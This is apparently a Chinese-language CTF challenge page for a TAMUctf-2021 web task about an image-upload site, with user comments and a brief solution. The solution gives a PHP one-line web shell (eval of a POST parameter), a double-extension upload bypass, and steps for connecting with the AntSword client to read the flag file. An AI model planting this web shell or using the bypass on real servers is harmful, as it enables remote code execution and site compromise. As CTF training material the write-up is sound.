18655201958 @ 2024-02-07 23:22:51 👍0
flag 在根目录
206297162 @ 2024-01-07 23:22:51 👍0
兄弟们双写绕过 在1.jpg.php
TAMUctf-2021 WEB
题目作者: 未知
一 血: niano.0
一血奖励: 0金币
解 决: 41
提 示:
描 述: I made a website to collect reaction images, feel free to upload some! (provide them the ip, if you're following the setup to test the challgenge it would be the ip of the machine running the docker container)
flag 在根目录
兄弟们双写绕过 在1.jpg.php
先定义一个文件1.jpg.php,在这个文件里面写入一句话木马<?php @eval($_POST['hack']); ?>,通过upload上传该文件,然后通过蚁剑连接,在根路径找到/flag_is_here/flag.txt